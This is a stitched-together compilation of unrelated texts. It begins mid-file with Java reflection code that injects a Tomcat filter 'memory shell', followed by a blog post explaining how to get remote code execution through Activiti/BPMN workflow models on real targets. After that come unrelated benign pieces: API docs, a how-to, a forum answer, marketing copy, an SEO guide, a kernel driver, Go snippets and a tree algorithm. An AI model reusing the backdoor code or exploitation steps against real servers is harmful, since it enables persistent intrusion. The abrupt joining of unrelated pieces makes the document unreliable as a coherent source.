Class<?> applicationFilterConfigClass = Thread.currentThread().getContextClassLoader().loadClass("org.apache.catalina.core.ApplicationFilterConfig");
Constructor<?> applicationFilterConfigConstructor = applicationFilterConfigClass.getDeclaredConstructor(ContextClass, FilterDefClass);
applicationFilterConfigConstructor.setAccessible(true);
Properties properties = new Properties();
properties.put("org.apache.catalina.ssi.SSIFilter", "123");
Field restrictedFiltersField = applicationFilterConfigClass.getDeclaredField("restrictedFilters");
restrictedFiltersField.setAccessible(true);
restrictedFiltersField.set(null, properties);
Object filterConfig = applicationFilterConfigConstructor.newInstance(standardContext, tmpFilterDef);
Field filterField = filterConfig.getClass().getDeclaredField("filter");
filterField.setAccessible(true);
filterField.set(filterConfig, testFilter);
Field filterDefField = filterConfig.getClass().getDeclaredField("filterDef");
filterDefField.setAccessible(true);
filterDefField.set(filterConfig, filterDef);
Class<?> StandardContextClass = Thread.currentThread().getContextClassLoader().loadClass("org.apache.catalina.core.StandardContext");
Field filterConfigsField = StandardContextClass.getDeclaredField("filterConfigs");
filterConfigsField.setAccessible(true);
HashMap filterConfigs = (HashMap) filterConfigsField.get(standardContext);
filterConfigs.put(filterName, filterConfig);
filterConfigsField.set(standardContext, filterConfigs);
System.out.println("Inject OK");
} catch (NoSuchMethodException ex) {
ex.printStackTrace();
} catch (IllegalAccessException ex) {
ex.printStackTrace();
} catch (InvocationTargetException ex) {
ex.printStackTrace();
} catch (InstantiationException ex) {
ex.printStackTrace();
} catch (Exception e) {
throw new RuntimeException(e);
}
}
public Object getField(Object object, String fieldName) {
Field declaredField;
Class clazz = object.getClass();
while (clazz != Object.class) {
try {
declaredField = clazz.getDeclaredField(fieldName);
declaredField.setAccessible(true);
return declaredField.get(object);
} catch (Exception e) {
// the field may not exist; swallow the error here (let it throw while testing)
}
clazz = clazz.getSuperclass();
}
return null;
}
public void getStandardContext() {
Thread[] threads = (Thread[]) this.getField(Thread.currentThread().getThreadGroup(), "threads");
Object object;
for (Thread thread : threads) {
if (thread == null) {
continue;
}
// skip unrelated threads
if (!thread.getName().contains("StandardEngine")) {
continue;
}
Object target = this.getField(thread, "target");
if (target == null) {
continue;
}
HashMap children;
try {
children = (HashMap) getField(getField(target, "this$0"), "children");
//org.apache.catalina.core.StandardHost standardHost = (org.apache.catalina.core.StandardHost) children.get(this.serverName);
children = (HashMap) getField(children.get(this.serverName), "children");
Iterator iterator = children.keySet().iterator();
while (iterator.hasNext()) {
String contextKey = (String) iterator.next();
if (!(this.uri.startsWith(contextKey))) {
continue;
}
// /spring_mvc/home/index startsWith /spring_mvc
//StandardContext standardContext = children.get(contextKey);
System.out.println(children.get(contextKey).getClass().getName());
this.standardContext = children.get(contextKey);
System.out.println("here");
// inject the memory shell
return;
}
} catch (Exception e) {
continue;
}
if (children == null) {
continue;
}
}
}
public void Tomcat678() {
Thread[] threads = (Thread[]) this.getField(Thread.currentThread().getThreadGroup(), "threads");
Object object;
for (Thread thread : threads) {
if (thread == null) {
continue;
}
if (thread.getName().contains("exec")) {
continue;
}
Object target = this.getField(thread, "target");
if (!(target instanceof Runnable)) {
continue;
}
try {
object = getField(getField(getField(target, "this$0"), "handler"), "global");
} catch (Exception e) {
continue;
}
if (object == null) {
continue;
}
java.util.ArrayList processors = (java.util.ArrayList) getField(object, "processors");
Iterator iterator = processors.iterator();
while (iterator.hasNext()) {
Object next = iterator.next();
Object req = getField(next, "req");
Object serverPort = getField(req, "serverPort");
if (serverPort.equals(-1)) {
continue;
}
// serverPort is -1 when this is not the matching request
System.out.println(getField(req, "serverNameMB").getClass().getName());
//org.apache.tomcat.util.buf.MessageBytes serverNameMB = (org.apache.tomcat.util.buf.MessageBytes) getField(req, "serverNameMB");
this.serverName = (String) getField(getField(req, "serverNameMB"), "strValue");
if (this.serverName == null) {
this.serverName = getField(req, "serverNameMB").toString();
}
// if (this.serverName == null){
// this.serverName = serverNameMB.getString();
// }
//org.apache.tomcat.util.buf.MessageBytes uriMB = (org.apache.tomcat.util.buf.MessageBytes) getField(req, "decodedUriMB");
this.uri = (String) getField(getField(req, "decodedUriMB"), "strValue");
if (this.uri == null) {
this.uri = getField(req, "decodedUriMB").toString();
}
// if (this.uri == null){
// this.uri = uriMB.getString();
// }
this.getStandardContext();
return;
}
}
}
}
Activiti/Workflow/bpmn engine code execution issues https://9bie.org/index.php/archives/954/ Fri, 04 Nov 2022 17:10:00 +0800 ⑨BIE Preface
I've run into this a few times in real-world engagements, so I'm writing it up for the record.
Reference first: "RCE issues caused by improper use of the Activiti BPMN process engine" (Activiti BPMN流程引擎使用不当导致的相关RCE问题).
The code can be taken straight from that reference as well.
In general, we only need to look for keywords in the admin backend — things like "flowchart" or "workflow" — or inspect the JSON in the response packets.
For example:
1.jpg
Another example:
2.jpg
We just need to confirm that we have permission to modify and deploy models.
Alternatively, watch the front-end requests, which look like this:
3.jpg
On the front end it looks like this:
4.png
As long as the site runs on Java and we have permission to modify models, we can proceed.
A model usually looks something like this:
{
"resourceId": "eb39ae1e2dd14910a165323fdcfd807e",
"properties": {
"process_id": "test",
"name": "rwar",
"documentation": "",
"process_author": "",
"process_version": "2",
"process_namespace": "archive_od",
"executionlisteners": [],
.....
}
Or the front end transmits BPMN directly:
4.jpg
Either form is directly exploitable. If it's XML we can upload the XML as-is; if it's JSON, the following code converts BPMN XML into JSON:
byte[] b = "bpmn xml bytes".getBytes();
InputStream bpmnStream = new ByteArrayInputStream(b); // the BPMN 2.0 XML
XMLInputFactory xif = XMLInputFactory.newInstance();
InputStreamReader in = new InputStreamReader(bpmnStream, "UTF-8");
XMLStreamReader xtr = xif.createXMLStreamReader(in);
// convert to a BpmnModel
BpmnModel bpmnModel = new BpmnXMLConverter().convertToBpmnModel(xtr);
// convert the BpmnModel to JSON
BpmnJsonConverter converter = new BpmnJsonConverter();
com.fasterxml.jackson.databind.node.ObjectNode editorJsonNode = converter.convertToJson(bpmnModel);
System.out.println(editorJsonNode);
Then you can invoke a class or EL expression to get direct code execution.
Back-end auditing
If we have a copy of the source code, how do we quickly find the exploitation point?
We only need three conditions:
• The injected model is controllable
• The start parameters can be obtained
• The start parameters are controllable
All three are required — if any one is missing, the attack won't run. In code terms: are the arguments to this.repositoryService.saveModel controllable; can we obtain the processDefinitionId value (or do without it, depending on what the code requires at runtime); and finally, can this.runtimeService run our model.
The article "RCE issues caused by improper use of the Activiti BPMN process engine" gives an example:
runtimeService.startProcessInstanceByKey("hireProcessWithJpa", vars);
Here hireProcessWithJpa is the key of the corresponding BPMN, but in practice startProcessInstanceByKey may not be used.
A fairly classic case is:
ProcessInstanceBuilder processInstanceBuilder = this.runtimeService.createProcessInstanceBuilder();
if (processDefinitionId != null) {
processInstanceBuilder.processDefinitionId(processDefinitionId);
}
if (startVariables != null) {
processInstanceBuilder.variables(startVariables);
}
ProcessInstance instance = processInstanceBuilder.start();
This code starts the process based on processDefinitionId, so different codebases call for different approaches, but in general you just need to keep an eye on this.runtimeService.
Next time you run into one of these, you'll be able to pop it with ease.
api.get_pricing(symbols, start_date='2013-01-03', end_date='2014-01-03', symbol_reference_date=None, frequency='daily', fields=None, handle_missing='raise')
Load a table of historical trade data.
Parameters:
• symbols (Object (or iterable of objects) convertible to Asset) – Valid input types are Asset, Integral, or basestring. In the case that the passed objects are strings, they are interpreted as ticker symbols and resolved relative to the date specified by symbol_reference_date.
• start_date (str or pd.Timestamp, optional) – String or Timestamp representing a start date for the returned data. Defaults to ‘2013-01-03’.
• end_date (str or pd.Timestamp, optional) – String or Timestamp representing an end date for the returned data. Defaults to ‘2014-01-03’.
• symbol_reference_date (str or pd.Timestamp, optional) – String or Timestamp representing a date used to resolve symbols that have been held by multiple companies. Defaults to the current time.
• frequency ({‘daily’, ‘minute’}, optional) – Resolution of the data to be returned.
• fields (str or list drawn from {‘price’, ‘open_price’, ‘high’, ‘low’, ‘close_price’, ‘volume’}, optional) – Default behavior is to return all fields.
• handle_missing ({‘raise’, ‘log’, ‘ignore’}, optional) – String specifying how to handle unmatched securities. Defaults to ‘raise’.
Returns:
pandas Panel/DataFrame/Series – The pricing data that was requested. See note below.
Notes
If a list of symbols is provided, data is returned in the form of a pandas Panel object with the following indices:
items = fields
major_axis = TimeSeries (start_date -> end_date)
minor_axis = symbols
If a string is passed for the value of symbols and fields is None or a list of strings, data is returned as a DataFrame with a DatetimeIndex and columns given by the passed fields.
If a list of symbols is provided, and fields is a string, data is returned as a DataFrame with a DatetimeIndex and columns given by the passed symbols.
If both parameters are passed as strings, data is returned as a Series.
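The shape logic above can be illustrated with plain pandas structures. This is a hypothetical sketch, not the Quantopian API itself: the Panel is represented here as a dict of DataFrames, and the symbols, fields, and values are invented.

```python
import pandas as pd

dates = pd.date_range("2013-01-03", periods=3, name="date")

# list of symbols + list of fields -> panel-like structure:
# one DataFrame per field (items), indexed by date (major_axis),
# with one column per symbol (minor_axis)
panel_like = {
    "price":  pd.DataFrame({"AAPL": [1.0, 2.0, 3.0], "MSFT": [4.0, 5.0, 6.0]}, index=dates),
    "volume": pd.DataFrame({"AAPL": [10, 20, 30],    "MSFT": [40, 50, 60]},    index=dates),
}

# single symbol + list of fields -> DataFrame (DatetimeIndex, columns = fields)
df = pd.DataFrame({field: panel_like[field]["AAPL"] for field in panel_like})

# single symbol + single field -> Series
series = panel_like["price"]["AAPL"]
```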
api.symbols(symbols, symbol_reference_date=None, handle_missing='log')
Convert a string or a list of strings into Asset objects.
Parameters:
• symbols (String or iterable of strings.) – Passed strings are interpreted as ticker symbols and resolved relative to the date specified by symbol_reference_date.
• symbol_reference_date (str or pd.Timestamp, optional) – String or Timestamp representing a date used to resolve symbols that have been held by multiple companies. Defaults to the current time.
• handle_missing ({‘raise’, ‘log’, ‘ignore’}, optional) – String specifying how to handle unmatched securities. Defaults to ‘log’.
Returns:
list of Asset objects – The symbols that were requested.
api.local_csv(path, symbol_column=None, date_column=None, use_date_column_as_index=True, timezone='UTC', symbol_reference_date=None, **read_csv_kwargs)
Load a CSV from the /data directory.
Parameters:
• path (str) – Path of file to load, relative to /data.
• symbol_column (string, optional) – Column containing strings to convert to Asset objects.
• date_column (str, optional) – Column to parse as Datetime. Ignored if parse_dates is passed as an additional keyword argument.
• use_date_column_as_index (bool, optional) – If True and date_column is supplied, set it as the frame index.
• timezone (str or pytz.timezone object, optional) – Interpret date_column as this timezone.
• read_csv_kwargs (optional) – Extra parameters to forward to pandas.read_csv.
Returns:
pandas.DataFrame – DataFrame with data from the loaded file.
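As a rough sketch of what local_csv does with its date-handling parameters (an assumption, not the actual implementation — the file content and column names below are invented), the parsing, indexing, and timezone behavior look like this in plain pandas:

```python
import io
import pandas as pd

# Stand-in for a file under /data
csv_text = "date,symbol,price\n2013-01-03,AAPL,10.5\n2013-01-04,AAPL,10.7\n"

# date_column='date' -> parse that column as Datetime
frame = pd.read_csv(io.StringIO(csv_text), parse_dates=["date"])

# use_date_column_as_index=True -> set the parsed column as the frame index
frame = frame.set_index("date")

# timezone='UTC' -> interpret the date column in that timezone
frame.index = frame.index.tz_localize("UTC")
```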
api.get_backtest(backtest_id)
Get the results of a backtest that was run on Quantopian.
Parameters:backtest_id (str) – The id of the backtest for which results should be returned.
Returns:BacktestResult – An object containing all the information stored by Quantopian about the performance of a given backtest run, as well as some additional metadata.
Notes
You can find the ID of a backtest in the URL of its full results page, which will be of the form:
https://www.quantopian.com/algorithms/<algorithm_id>/<backtest_id>
api.get_fundamentals(query, base_date, range_specifier=None, filter_ordered_nulls=None)
Load a table of historical fundamentals data.
Parameters:
• query (SQLAlchemy Query object) – An SQLAlchemy Query representing the fundamentals data desired. Full documentation of the available fields for use in the query function can be found at http://quantopian.com/help/fundamentals
• base_date (str in the format “YYYY-MM-DD”) – Represents the date on which data is to be queried.
• range_specifier (str in the format {number}{One of ‘m’, ‘d’, ‘y’, ‘w’, ‘q’}, optional) – Represents the interval at which to query data. For example, a base_date of “2014-01-01” with a range_specifier of “4y” will return 4 data values at yearly intervals, from 2014-01-01 going backwards.
• filter_ordered_nulls (bool, optional) – When True, if you are sorting the query results via an order_by method, any row with a NULL value in the sorted column will be filtered out. Setting to False overrides this behavior and provides you with rows with a NULL value for the sorted column.
Returns:
pandas.Panel – A Pandas panel containing the requested fundamentals data.
Notes
Before calling get_fundamentals, you first need to call the fundamentals initializer once with:
fundamentals = init_fundamentals()
This function needs to be called only once, following which get_fundamentals can be used as normal.
Querying of quarterly data is still under development and may sometimes return inaccurate values.
How to add, delete, or rename a Notebook in Yahoo Notepad?
Thursday, 25 July 107 Views Computers & Internet
Correct Answer
Add, delete, or rename a notebook in Yahoo Notepad
Organize your notes by placing them in notebooks where they are easy to locate. Think of notebooks as folders where you can save notes. Create multiple notebooks to separate different facets of your life, such as recipes, trips, letters, and to-do lists.
Add a notebook
1. From Yahoo Mail, click on the Notepad icon.
2. In the left column, click New notebook.
3. Enter the name of your notebook.
4. Press Enter
Delete a notebook
1. From Yahoo Mail, click on the Notepad icon.
2. Right click on the title of a notebook in the left column.
3. Click Delete notebook.
4. Click Delete
Rename a notebook
1. From Yahoo Mail, click on the Notepad icon.
2. Right click on the title of a notebook in the left column.
3. Click Rename Notebook.
4. Update the name of your notebook.
5. Press Enter
Hosts file clarification wanted please
I am in the process of trying to set up a DigitalOcean Droplet running Ubuntu 14.04, Apache2, PHP, and MySQL…
I have managed to create virtual host files in "/etc/apache2/sites-available/test.com.conf" and similar for example.com (and also my real sites, which are in the process of being propagated).
I read somewhere that the following Linux Mint command can be used to access the Droplets
sudo nano /etc/hosts
# **localhost** works OK in my browser and can show the relevant Droplet Virtual Host
127.0.0.1 localhost
# both these work OK in my browser
123.45.67.89 test.com
123.45.67.89 example.com
**My question:** If I supply the actual DNS Record name to someone else can they access my Droplet?
edit:
I hope I have used the correct names, etc, if not please highlight the mistakes.
Yes, provided that it is a public address available to anyone. There are a few ranges that are defined as private to the local network, so if you provide one of those it will only work for people who are on your local network.
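The public-vs-private distinction the reply mentions can be checked with Python's ipaddress module; the addresses below are the example ones from the question:

```python
import ipaddress

def is_public(addr: str) -> bool:
    """True if the address is neither private (RFC 1918) nor loopback."""
    ip = ipaddress.ip_address(addr)
    return not (ip.is_private or ip.is_loopback)

print(is_public("127.0.0.1"))     # loopback -> False
print(is_public("192.168.1.5"))   # private  -> False
print(is_public("123.45.67.89"))  # public   -> True
```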
User Guide
LLM observability is complete visibility into every layer of an LLM-based software system: the application, the prompt, and the response.
Phoenix is a comprehensive platform designed to enable observability across every layer of an LLM-based system, empowering teams to build, optimize, and maintain high-quality applications efficiently.
Develop
During the development phase, Phoenix offers essential tools for debugging, prompt tracking, and search and retrieval optimization.
Traces for Debugging
Phoenix's tracing and span analysis capabilities are invaluable during the prototyping and debugging stages. By instrumenting application code with Phoenix, teams gain detailed insights into the execution flow, making it easier to identify and resolve issues. Developers can drill down into specific spans, analyze performance metrics, and access relevant logs and metadata to streamline debugging efforts.
Prompt Tracking
Leverage experiments to track prompt performance and evaluate the outputs. Phoenix also tracks prompt templates, variables, and versions during execution to help you identify improvements and degradations.
Search & Retrieval Embeddings Visualizer
Phoenix's search and retrieval optimization tools include an embeddings visualizer that helps teams understand how their data is being represented and clustered. This visual insight can guide decisions on indexing strategies, similarity measures, and data organization to improve the relevance and efficiency of search results.
Testing/Staging
In the testing and staging environment, Phoenix supports comprehensive evaluation, benchmarking, and data curation. Traces, prompt tracking, and embedding visualizer remain important in the testing and staging phase, helping teams identify and resolve issues before deployment.
Benchmarking of Evals
Phoenix allows teams to benchmark their evaluation metrics against industry standards or custom baselines. This helps ensure that the LLM application meets performance and quality targets before moving into production.
Evals Testing
Phoenix's flexible evaluation framework supports thorough testing of LLM outputs. Teams can define custom metrics, collect user feedback, and leverage separate LLMs for automated assessment. Phoenix offers tools for analyzing evaluation results, identifying trends, and tracking improvements over time.
Curate Data
Phoenix assists in curating high-quality data for testing and fine-tuning. It provides tools for data exploration, cleaning, and labeling, enabling teams to curate representative data that covers a wide range of use cases and edge conditions.
Production
In production, Phoenix works hand-in-hand with Arize, which focuses on the production side of the LLM lifecycle. The integration ensures a smooth transition from development to production, with consistent tooling and metrics across both platforms.
Traces in Production
Phoenix and Arize use the same collector frameworks in development and production. This allows teams to monitor latency, token usage, and other performance metrics, setting up alerts when thresholds are exceeded.
Evals for Production
Phoenix's evaluation framework can be used to generate ongoing assessments of LLM performance in production. Arize complements this with online evaluations, enabling teams to set up alerts if evaluation metrics, such as hallucination rates, go beyond acceptable thresholds.
Fine-tuning
Phoenix and Arize together help teams identify data points for fine-tuning based on production performance and user feedback. This targeted approach ensures that fine-tuning efforts are directed towards the most impactful areas, maximizing the return on investment.
Phoenix, in collaboration with Arize, empowers teams to build, optimize, and maintain high-quality LLM applications throughout the entire lifecycle. By providing a comprehensive observability platform and seamless integration with production monitoring tools, Phoenix and Arize enable teams to deliver exceptional LLM-driven experiences with confidence and efficiency.
How to create websites with standard SEO articles
Many shop owners and businesses now create their own websites to run their online business effectively. But do you know how to create a website with SEO-standard articles? The following article shares some pointers on exactly that.
Google in particular, and search engines in general, are powerful systems that process information at high speed and in large volumes. If you cannot meet certain criteria — for example, developing SEO-standard articles that improve your page's ranking — those engines will not show impressions for your website.
The result is that your product will not reach the customer. Search can be considered the first, and a very important, channel through which customers find you, choose your products, and bring you revenue!
Based on market research, or simply your own observations of consumer demand, first build your website around an effective set of keywords that match your audience's tastes. This sounds simple, but it requires sharp market awareness: terms such as "website construction", "website costs", and "effective sales" are all keywords you can build into a framework for the SEO-standard articles to come.
The title is the first thing that attracts readers to your article! A clear title that hits the user's existing needs will help you score points from the very first moment. Also note that the title should be neither too long nor too short.
Your title should contain the keywords you built above, because these are the core terms customers will search for in the information you provide.
In addition, you can use strong exclamations in the title to spark the reader's curiosity, but of course it shouldn't be too jarring — sometimes that provokes objections and becomes counterproductive for everyone.
Some steps to write SEO standard for website quickly on TOP
For your website to get plenty of traffic — especially traffic from search engines — and for your customers to get more useful information from you, your articles must not only have useful content but also follow SEO standards.
Identify topics that potential customers care about:
You determine the website's overall topic beforehand. For example, if your website is about fashion, your topic is fashion. But the topic of an individual article means something specific within that: for example, the most beautiful women's fashion sets for winter, or the winter men's fashion trend.
Identify target keywords:
Once you have identified a topic of interest, type it into the Google Keyword Planner tool to see that keyword and other related keywords. You need to know which terms are searched more often and how competitive they are. Choose a keyword that gets plenty of traffic with moderate or low competition.
Determine the type of article:
Determining the type of article will shape your editorial direction. There are many formats to choose from: product reviews, product comparisons, lists, or commentary on a particular topic. You can also decide who your article is written for and for what purpose — a sales article, a reference article, or a knowledge-sharing article. And don't forget to ask whether the article is useful to readers, and whether readers will like the content you write.
Build article structure:
There are many ways to start writing, but writing without an outline can make your article rambling and unfocused. To avoid this, build the structure of the article first. Outlining will also increase your productivity and improve how Google evaluates your content, because Google's bots will understand the main ideas in your article.
A properly documented software architecture
A well-documented architecture helps developers navigate the system's structure during maintenance. This can save valuable time and resources, as developers better understand how to solve problems and add new features without compromising system stability and consistency.
Regulatory compliance. Some industries may require software architecture to be documented according to specific rules or standards. By maintaining a well-documented architecture, organizations can ensure compliance with industry regulations and reduce the risk of potential legal issues.
Key Elements of an Effective Software Architecture Document
To create an effective software architecture document that accurately captures the essence of the system and provides valuable information to stakeholders, consider including the following key elements:
Context or system scope. Start the documentation by describing the scope of the system and setting the context. Describe the purpose of the system, its users, and the environment in which it will operate. This helps set the stage for a better understanding of the overall architecture of the system and creates common ground for all parties involved in the project.
Architectural goals and constraints. Clearly state the goals and constraints that influenced the architectural decisions for the system. This includes consideration of functional and non-functional requirements, as well as any specific constraints imposed by the environment, organization, or technology stack. Establishing goals and constraints will provide justification for the selected architectural patterns, components, and design decisions.
Architectural views and perspectives. Represent the architecture of the system using multiple views — such as logical, physical, process, or use-case views — to display different aspects of the system and its components. Each view should focus on a particular aspect of the architecture and provide a concise, consistent picture of it. Also include architectural perspectives that discuss cross-cutting concerns such as security, performance, or scalability.
Component diagrams. Include diagrams illustrating the main components and their relationships within the system. These diagrams can range from high-level abstract representations to more detailed and specific visualizations. Be sure to use clear, consistent notation and terminology to avoid confusion or misinterpretation.
Linux/arch/powerpc/platforms/83xx/mcu_mpc8349emitx.c
/*
 * Power Management and GPIO expander driver for MPC8349E-mITX-compatible MCU
 *
 * Copyright (c) 2008 MontaVista Software, Inc.
 *
 * Author: Anton Vorontsov <avorontsov@ru.mvista.com>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 */

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/device.h>
#include <linux/mutex.h>
#include <linux/i2c.h>
#include <linux/gpio.h>
#include <linux/of.h>
#include <linux/of_gpio.h>
#include <linux/slab.h>
#include <linux/kthread.h>
#include <linux/reboot.h>
#include <asm/prom.h>
#include <asm/machdep.h>

/*
 * I don't have specifications for the MCU firmware, I found this register
 * and bits positions by the trial&error method.
 */
#define MCU_REG_CTRL    0x20
#define MCU_CTRL_POFF   0x40
#define MCU_CTRL_BTN    0x80

#define MCU_NUM_GPIO    2

struct mcu {
        struct mutex lock;
        struct i2c_client *client;
        struct gpio_chip gc;
        u8 reg_ctrl;
};

static struct mcu *glob_mcu;

struct task_struct *shutdown_thread;
static int shutdown_thread_fn(void *data)
{
        int ret;
        struct mcu *mcu = glob_mcu;

        while (!kthread_should_stop()) {
                ret = i2c_smbus_read_byte_data(mcu->client, MCU_REG_CTRL);
                if (ret < 0)
                        pr_err("MCU status reg read failed.\n");
                mcu->reg_ctrl = ret;

                if (mcu->reg_ctrl & MCU_CTRL_BTN) {
                        i2c_smbus_write_byte_data(mcu->client, MCU_REG_CTRL,
                                        mcu->reg_ctrl & ~MCU_CTRL_BTN);

                        ctrl_alt_del();
                }

                set_current_state(TASK_INTERRUPTIBLE);
                schedule_timeout(HZ);
        }

        return 0;
}

static ssize_t show_status(struct device *d,
                           struct device_attribute *attr, char *buf)
{
        int ret;
        struct mcu *mcu = glob_mcu;

        ret = i2c_smbus_read_byte_data(mcu->client, MCU_REG_CTRL);
        if (ret < 0)
                return -ENODEV;
        mcu->reg_ctrl = ret;

        return sprintf(buf, "%02x\n", ret);
}
static DEVICE_ATTR(status, S_IRUGO, show_status, NULL);

static void mcu_power_off(void)
{
        struct mcu *mcu = glob_mcu;

        pr_info("Sending power-off request to the MCU...\n");
        mutex_lock(&mcu->lock);
        i2c_smbus_write_byte_data(mcu->client, MCU_REG_CTRL,
                                  mcu->reg_ctrl | MCU_CTRL_POFF);
        mutex_unlock(&mcu->lock);
}

static void mcu_gpio_set(struct gpio_chip *gc, unsigned int gpio, int val)
{
        struct mcu *mcu = container_of(gc, struct mcu, gc);
        u8 bit = 1 << (4 + gpio);

        mutex_lock(&mcu->lock);
        if (val)
                mcu->reg_ctrl &= ~bit;
        else
                mcu->reg_ctrl |= bit;

        i2c_smbus_write_byte_data(mcu->client, MCU_REG_CTRL, mcu->reg_ctrl);
        mutex_unlock(&mcu->lock);
}

static int mcu_gpio_dir_out(struct gpio_chip *gc, unsigned int gpio, int val)
{
        mcu_gpio_set(gc, gpio, val);
        return 0;
}

static int mcu_gpiochip_add(struct mcu *mcu)
{
        struct device_node *np;
        struct gpio_chip *gc = &mcu->gc;

        np = of_find_compatible_node(NULL, NULL, "fsl,mcu-mpc8349emitx");
        if (!np)
                return -ENODEV;

        gc->owner = THIS_MODULE;
        gc->label = np->full_name;
        gc->can_sleep = 1;
        gc->ngpio = MCU_NUM_GPIO;
        gc->base = -1;
        gc->set = mcu_gpio_set;
        gc->direction_output = mcu_gpio_dir_out;
        gc->of_node = np;

        return gpiochip_add(gc);
}

static int mcu_gpiochip_remove(struct mcu *mcu)
{
        return gpiochip_remove(&mcu->gc);
}

static int mcu_probe(struct i2c_client *client, const struct i2c_device_id *id)
{
        struct mcu *mcu;
        int ret;

        mcu = kzalloc(sizeof(*mcu), GFP_KERNEL);
        if (!mcu)
                return -ENOMEM;

        mutex_init(&mcu->lock);
        mcu->client = client;
        i2c_set_clientdata(client, mcu);

        ret = i2c_smbus_read_byte_data(mcu->client, MCU_REG_CTRL);
        if (ret < 0)
                goto err;
        mcu->reg_ctrl = ret;

        ret = mcu_gpiochip_add(mcu);
        if (ret)
                goto err;

        /* XXX: this is potentially racy, but there is no lock for ppc_md */
        if (!ppc_md.power_off) {
                glob_mcu = mcu;
                ppc_md.power_off = mcu_power_off;
                dev_info(&client->dev, "will provide power-off service\n");
        }

        if (device_create_file(&client->dev, &dev_attr_status))
                dev_err(&client->dev,
                        "couldn't create device file for status\n");

        shutdown_thread = kthread_run(shutdown_thread_fn, NULL,
                                      "mcu-i2c-shdn");

        return 0;
err:
        kfree(mcu);
        return ret;
}

static int mcu_remove(struct i2c_client *client)
{
        struct mcu *mcu = i2c_get_clientdata(client);
        int ret;

        kthread_stop(shutdown_thread);

        device_remove_file(&client->dev, &dev_attr_status);

        if (glob_mcu == mcu) {
                ppc_md.power_off = NULL;
                glob_mcu = NULL;
        }

        ret = mcu_gpiochip_remove(mcu);
        if (ret)
                return ret;
        kfree(mcu);
        return 0;
}

static const struct i2c_device_id mcu_ids[] = {
        { "mcu-mpc8349emitx", },
        {},
};
MODULE_DEVICE_TABLE(i2c, mcu_ids);

static struct of_device_id mcu_of_match_table[] = {
        { .compatible = "fsl,mcu-mpc8349emitx", },
        { },
};

static struct i2c_driver mcu_driver = {
        .driver = {
                .name = "mcu-mpc8349emitx",
                .owner = THIS_MODULE,
                .of_match_table = mcu_of_match_table,
        },
        .probe = mcu_probe,
        .remove = mcu_remove,
        .id_table = mcu_ids,
};

module_i2c_driver(mcu_driver);

MODULE_DESCRIPTION("Power Management and GPIO expander driver for "
                   "MPC8349E-mITX-compatible MCU");
MODULE_AUTHOR("Anton Vorontsov <avorontsov@ru.mvista.com>");
MODULE_LICENSE("GPL");
Example #1
func (srv *Server) get(c *gin.Context) {
key := c.Param("key")
if res, err := srv.keystorage.Get(key); err == nil {
obj := model.NewOvoKVResponse(res)
result := model.NewOvoResponse("done", "0", obj)
c.JSON(http.StatusOK, result)
} else {
c.JSON(http.StatusNotFound, model.NewOvoResponse("error", "101", nil))
}
}
Example #2
func (srv *Server) getAndRemove(c *gin.Context) {
key := c.Param("key")
if res, err := srv.keystorage.GetAndRemove(key); err == nil {
obj := model.NewOvoKVResponse(res)
srv.outcmdproc.Enqueu(&command.Command{OpCode: "delete", Obj: &storage.MetaDataUpdObj{Key: key}})
result := model.NewOvoResponse("done", "0", obj)
c.JSON(http.StatusOK, result)
} else {
c.JSON(http.StatusNotFound, model.NewOvoResponse("error", "101", nil))
}
}
Maximum level sum in a binary tree
Category: Data Structures
Tags: #datastructures#tree#binary-tree
Write a program to find the maximum level sum in a binary tree even if nodes may have negative values also. To find the maximum level sum, traverse each level separately and find the sum of each level.
Maximum level sum in a tree
A tree has different levels; among those levels we have to identify the level with the maximum sum of node values. Nodes may also have negative values.
To find the maximum level sum in a binary tree we have to traverse the tree in level order and consider each level separately then compare the sum of each level.
Example -
Input:
1
/ \
2 3
/ \ / \
4 5 6 7
Output: 2
Solution
For the solution, we have to visit each node, which can be achieved with level order traversal while maintaining the sum of each level separately and comparing it against the maximum sum seen on previous levels.
Algorithm
Max_Level_Sum(root)
1. if root is not null
2. queue.enqueue(root)
3. queue.enqueue(null)
4. node = null
5. level = max_level = current_sum = max_sum = 0
6. while queue is not empty
7. node = q.dequeue()
8. if node is null then
9. if current_sum > max_sum then
10. max_sum = current_sum
11. max_level = level
12. current_sum = 0
13. if queue is not empty
14. level = level + 1
15. queue.enqueue(null)
16. else
17. current_sum = current_sum + node.data
18. if node.left is not null
19. queue.enqueue(node.left)
20. if node.right is not null
21. queue.enqueue(node.right)
22. return max_level
23. else
24. return null
Python
import queue

class Node:
    def __init__(self, data):
        self.left = None
        self.data = data
        self.right = None

def max_level_sum(root):
    if root:
        q = queue.Queue()
        q.put(root)
        q.put(None)  # null marker separating levels
        node = None
        level = max_level = current_sum = 0
        max_sum = float("-inf")  # -inf so all-negative trees are handled
        while not q.empty():
            node = q.get()
            if node is None:
                # End of a level: compare its sum against the best so far
                if current_sum > max_sum:
                    max_sum = current_sum
                    max_level = level
                current_sum = 0
                if not q.empty():
                    level += 1
                    q.put(None)
            else:
                current_sum += node.data
                if node.left:
                    q.put(node.left)
                if node.right:
                    q.put(node.right)
        return max_level
    else:
        return None

root = Node(1)
root.left = Node(2)
root.right = Node(3)
root.left.left = Node(4)
root.left.right = Node(5)
root.right.left = Node(6)
root.right.right = Node(7)
print(max_level_sum(root))
JavaScript
class Node {
    constructor(data) {
        this.left = null;
        this.data = data;
        this.right = null;
    }
}

function maxLevelSum(root) {
    if (root) {
        const q = [];
        q.push(root);
        q.push(null); // null marker separating levels
        let node = null;
        let level = 0, max_level = 0, current_sum = 0;
        let max_sum = -Infinity; // -Infinity so all-negative trees are handled
        while (q.length > 0) {
            node = q.shift();
            if (node === null) {
                // End of a level: compare its sum against the best so far
                if (current_sum > max_sum) {
                    max_sum = current_sum;
                    max_level = level;
                }
                current_sum = 0;
                if (q.length > 0) {
                    level++;
                    q.push(null);
                }
            } else {
                current_sum += node.data;
                if (node.left) q.push(node.left);
                if (node.right) q.push(node.right);
            }
        }
        return max_level;
    } else {
        return null;
    }
}

const root = new Node(1);
root.left = new Node(2);
root.right = new Node(3);
root.left.left = new Node(4);
root.left.right = new Node(5);
root.right.left = new Node(6);
root.right.right = new Node(7);
console.log(maxLevelSum(root));
Output
2
Here, we return the level with the maximum sum; if the sum itself is needed instead, return the variable max_sum from the function.
Time complexity: O(n), since the level-order traversal visits each node exactly once.
